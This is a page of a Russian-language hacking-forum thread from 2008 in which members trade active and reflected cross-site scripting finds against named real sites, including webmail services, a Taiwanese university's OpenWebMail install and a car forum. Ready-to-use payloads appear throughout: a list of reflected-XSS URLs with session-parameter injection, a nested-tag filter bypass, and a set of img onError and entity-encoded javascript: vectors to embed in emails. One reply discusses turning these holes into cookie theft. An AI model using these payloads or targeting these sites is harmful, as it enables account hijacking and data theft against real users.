HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Активные Xss
   
Ответ
Страница 24 из 54 « Первая < 14 20 21 22 23 24 25 26 27 28 34 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #231  
Старый 07.08.2008, 08:13
Bonnie and Clyde
Новичок
Регистрация: 26.07.2008
Сообщений: 20
С нами: 9364718

Репутация: 14
По умолчанию
Активная XSS в бесплатной почтовой системе NextMail.ru
@nextmail.ru
@nxt.ru
@epage.ru
@email.su
@student.su
@hu2.ru
@xaker.ru
@mail2k.ru
@dezigner.ru
@programist.ru
@onlymail.ru
@logmail.ru
Отправляем письмо адресату с прикрепленным файлом, в прикрепленном файле пишем код.
(прим.: <script>alert(document.coocke);</script>)

XSS работает только(!) в IE (по крайней мере у меня в Опере и Мозилле не сработало)
 
Ответить с цитированием

  #232  
Старый 07.08.2008, 08:31
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию
Bonnie and Clyde, работает и в ие, и в опере, и в фф:
https://forum.antichat.ru/showpost.php?p=779537&postcount=229
 
Ответить с цитированием

  #233  
Старый 08.08.2008, 12:28
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Код:
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-send.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-advsearch.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-folder.pl?action=editfolders&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-prefs.pl?action=editprefs&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-abook.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-main.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-read.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-cal.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E 
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-webdisk.pl?action=showdir&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
 
Ответить с цитированием

  #234  
Старый 10.08.2008, 14:30
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами: 9875796

Репутация: 770
По умолчанию
Блог:
http://blogspot.com/

пример первой попавшейся xss. при создании своего блога вписываем алер и:
http://1111vvv.blogspot.com/
 
Ответить с цитированием

  #235  
Старый 10.08.2008, 21:28
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
С нами: 10692326

Репутация: 531


По умолчанию
от нее смысла нету. куки она не передает так как куки идут с блогера. только если связку ставить или редирект
 
Ответить с цитированием

  #236  
Старый 13.08.2008, 13:49
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами: 9875796

Репутация: 770
По умолчанию
http://mymail-in.net/
срабатывает 11 XSS в теле письма. проверено с помощью "SMTP XSS Tester v1.0"
// Наверное это можно считать за активную xss?
 
Ответить с цитированием

  #237  
Старый 13.08.2008, 20:58
echobyte
Постоянный
Регистрация: 07.03.2008
Сообщений: 568
С нами: 9567626

Репутация: 708


По умолчанию
http://nexile.ru/href/5713.html

В обьявлениях фильтруется script
соответственно "><scr<script>ipt>alert()</scr</script>ipt>
 
Ответить с цитированием

  #238  
Старый 14.08.2008, 09:59
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами: 9875796

Репутация: 770
По умолчанию
Сервер: mail.km.ru
зарегал мыло на http://bossmail.ru/
создаем письмо, вписываем в него алерты с таким телом письма:
Код:
<body>
<img src="a"onError=alert(121)>
<img src='a'onError=alert(122)>
<img src=javascript&#13:alert(79)>
<img src=javascript&#10:alert(68)>
<img src=javascript&#9:alert(57)>
<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert(46)>
<img src=javascript:alert(16)>
</body>
открываем письмо у себя в папке или отправляем его с небольшими изменениями ; )
Последний раз редактировалось Calcutta; 15.08.2008 в 05:44..
 
Ответить с цитированием

  #239  
Старый 14.08.2008, 18:54
echobyte
Постоянный
Регистрация: 07.03.2008
Сообщений: 568
С нами: 9567626

Репутация: 708


По умолчанию
http://fotocelebrity.net/anna-seminovich/anna-seminovich27.php
 
Ответить с цитированием

xss
  #240  
Старый 15.08.2008, 16:39
NApoleonchik
Участник форума
Регистрация: 04.07.2007
Сообщений: 111
С нами: 9922725

Репутация: 102
По умолчанию xss
PR 2
тИЦ 10

http://www.auto-magnitola.ru/forum/index.php

Уязвимы все поля в форуме. Ничего не фильтруется

))
Последний раз редактировалось NApoleonchik; 15.08.2008 в 16:41..
 
Ответить с цитированием
Ответ
Страница 24 из 54 « Первая < 14 20 21 22 23 24 25 26 27 28 34 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.